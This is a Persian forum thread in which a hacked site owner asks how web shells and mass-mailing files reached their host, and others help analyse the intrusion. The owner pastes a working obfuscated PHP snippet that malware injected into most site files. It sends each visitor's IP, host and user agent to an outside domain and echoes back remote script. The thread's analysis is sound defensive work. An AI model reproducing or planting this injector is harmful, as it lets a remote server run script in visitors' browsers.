PDA

View Full Version : پیدا کردن باگ سیستم



masiha68
دوشنبه 26 مرداد 1394, 18:43 عصر
سلام دوستان
مدتی قبل متوجه شدم که یه سری شل روی هاستم نصب شده و یه سری فایل که واسه ارسال ایمیل انبوه به کار می رفته
اونا رو پاک کردم ولی حالا میخام بدونم از کجا این فایل ها روی هاست اپلود شدن
فایل لاگ ها رو دارم ... به نظرتون راهی هست واسه فهمیدن این موضوع ؟

pbm_soy
سه شنبه 27 مرداد 1394, 01:10 صبح
تنها راهش بررسی همه لاگهاست
بهتر است سرچ کنید در مورد اتنواع لاگهایی که لیبنوکس ثبت میکند و مهمتر از همه لاگهای وب سرور است البته باید بگم که بیشتر کنترل پنلهای هاست لاگهای سیستم و وب سرور و خود سایت را بصورت خوب و با فرمت مناسب نمایش میدهد
من الان تک تک لاگها یادم نمیاد ولی شما از طریق کنترل پنل هاست کل درخواستهاس http , https روی سایتتون را نمایش میدهد که چه لینکهایی توسط کدوم کلاینتها درخواست شدن و همینظور کدوم فرمها submit شدن و همینطور خوششانس باشید میتوانید نحوه آپلود کردن فایل شل را پیدا کنید البته اگه شل را توسط باگ وب سایت آپلود کرده باشند در غیر اینصورت باید لاگهای خود لینوکس را بررسی کنید
قبل از حذف شلها آنها را برای خودتان کپی گرفتید؟ چون شاید با بررسی خود فایل هم به یکسری نتایج برسید
مثلا شل ساده است و فقط یک خطی است؟ و یا اینکه شل بزرگ است و امکانات زیادی دارد؟ و یا شاید امضا نویسنده و یا آپلود کننده روی فایل باشد
حالا بررسی کردید با شل چه کارای کرده ؟
آیا دسترسی به شل یا همان خط فرمان ترمینال سایت دسترسی دارید؟ باید بگم که حتی هاست هم گررفته باشید برخی شرکت ها اجازه دسنرسی به ترمینال خط فرمان فقط به محدوده هاست میدهند با سرویس ssh

pbm_soy
سه شنبه 27 مرداد 1394, 01:13 صبح
در هر صورت مطمین باشید بلاخره ردپایی از طرف باقی مانده است
و یا حداقل میتوانید بفهمید چطوری شل را آپلود کرده؟
یادم رفت بپرسیم در چه فولدری آپلود کرده؟ پرمیسشن فولدر چی بود؟

masiha68
سه شنبه 27 مرداد 1394, 08:27 صبح
تنها راهش بررسی همه لاگهاست
بهتر است سرچ کنید در مورد اتنواع لاگهایی که لیبنوکس ثبت میکند و مهمتر از همه لاگهای وب سرور است البته باید بگم که بیشتر کنترل پنلهای هاست لاگهای سیستم و وب سرور و خود سایت را بصورت خوب و با فرمت مناسب نمایش میدهد
من الان تک تک لاگها یادم نمیاد ولی شما از طریق کنترل پنل هاست کل درخواستهاس http , https روی سایتتون را نمایش میدهد که چه لینکهایی توسط کدوم کلاینتها درخواست شدن و همینظور کدوم فرمها submit شدن و همینطور خوششانس باشید میتوانید نحوه آپلود کردن فایل شل را پیدا کنید البته اگه شل را توسط باگ وب سایت آپلود کرده باشند در غیر اینصورت باید لاگهای خود لینوکس را بررسی کنید
قبل از حذف شلها آنها را برای خودتان کپی گرفتید؟ چون شاید با بررسی خود فایل هم به یکسری نتایج برسید
مثلا شل ساده است و فقط یک خطی است؟ و یا اینکه شل بزرگ است و امکانات زیادی دارد؟ و یا شاید امضا نویسنده و یا آپلود کننده روی فایل باشد
حالا بررسی کردید با شل چه کارای کرده ؟
آیا دسترسی به شل یا همان خط فرمان ترمینال سایت دسترسی دارید؟ باید بگم که حتی هاست هم گررفته باشید برخی شرکت ها اجازه دسنرسی به ترمینال خط فرمان فقط به محدوده هاست میدهند با سرویس ssh

حدود 70 هزار خط کد توی فایل لاگ بود و وقتی برسی کردم دیدم اکثرا ارسال ایمیل بوده ... طرف یه شل اپلود کرده و بعد اومد از طریق اون چندتا فایل اپلودکرده و با استفاده از اونا یه ایمیل مارکتینگ روی هاستم راه انداخته ... اولش فک کردم مشکل از فایل منیجری بوده که توی ادیتور نصبش کرده بودم و یادم رفته بود که امنیتش رو چک کنم ... شل ها رو حذف کردم و اون فایل منیجر رو هم حذف کردم . بعد چند روز دیدم سایتم رو بخاطر ارسال ایمیل زیاد بستن و وقتی برسی کردم دیدم طرف ومده و یه سری فایل دیگه اپ کرده و بازم همون قضیه ولی این بار اومدم فایل های سایتم رو برسی کردم که مبادا توی یکشون یه کد گذاشته واسه اپلود که این خط مواجه شدم


#883067#
error_reporting(0); @ini_set('display_errors',0); $wp_limmj7519 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_limmj7519) && !preg_match ('/bot/i', $wp_limmj7519))){
$wp_limmj097519="http://"."https"."http".".com/"."http/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_limmj7519);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_limmj097519); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_7519limmj = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_7519limmj = @file_get_contents($wp_limmj097519);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_7519limmj=@stream_get_contents(@fopen($wp_lim mj097519, "r"));}}
if (substr($wp_7519limmj,1,3) === 'scr'){ echo $wp_7519limmj; }
#/883067#


بیشتر که برسی کردم دیدم یه ویروس انداخته تو سیستم که بیشتر فایل ها این خط کد رو اضافه کرده

من از شل ها و فایل ها و لاگ ها یه کپی روی سیستمم دارم . اگه لازمه اونها رو بزارم که بتونید بررسی کنید چون خودم هر کاری کردم نتونستم بفهمم قضیه از چ قراره و این طوری که معلومه با هکر خیلی حرفه ای طرفم

masiha68
سه شنبه 27 مرداد 1394, 08:31 صبح
در هر صورت مطمین باشید بلاخره ردپایی از طرف باقی مانده است
و یا حداقل میتوانید بفهمید چطوری شل را آپلود کرده؟
یادم رفت بپرسیم در چه فولدری آپلود کرده؟ پرمیسشن فولدر چی بود؟
سری اول فایل ها رو توی public_html پیدا کردم و قسمت ارسال ایمیل رو هم توی پوشه بالاتر ...
پرمشن ها روی 755 واسه پوشه ها بود

us1234
سه شنبه 27 مرداد 1394, 19:28 عصر
این کدی که گذاشتید یکسری اطلاعات مثل دامین و آی پی را به این سایت ارسال میکنه http://httpshttp.com
و نتیجه را در سایت نمایش میدهد .
احتمالا با این کار در سایت شما تبلیغ نمایش میداده ...

بهترین کار این است که کل فایلهای داخل هاست خود را روی سیستم خود دانلود کنید و تک تک کارکتر ها را بررسی کنید و بعد دوباره آپلود کنید .

در استفاده از افزونه های وردپرس خیلی دقت کنید ، بدون بررسی کد هیچ افزونه ای را نصب نکنید .
پلاگین های وردپرس قابلیت آپدیت شدن دارند و اگر نویسنده پلاگین معتبر نباشه به سادگی میتونه هر فایلی که دوست داشته باشد را داخل سایت شما آپلود کند .

kb0y667
چهارشنبه 25 شهریور 1394, 15:53 عصر
درسته که ip و userAgent و referrer رو ارسال میکنه به httpshttp.com
ولی ....
نخیر ، نتیجه رو نمایش نمیده

بعد از ارسال درخواست ، یک اسکریپت دریافت میکنه
و اون اسکریپت اجرا میشه

که احتمال زیاد بعد از این ، تازه شل اصلی تزریق میشه
و هدفش این بوده که شل اصلی که ساخت خودشه بدست کسی نیافته

سایت ش طوری تنظیم شده که احتمالا فقط referrer مجاز از سمت طعمه مشخص شده براش معتبر هست
من هرچه سعی کردم هیچ کدی پس نداد

بهتر بود شما دامنه (آدرس) سایت تون رو بیان میکردید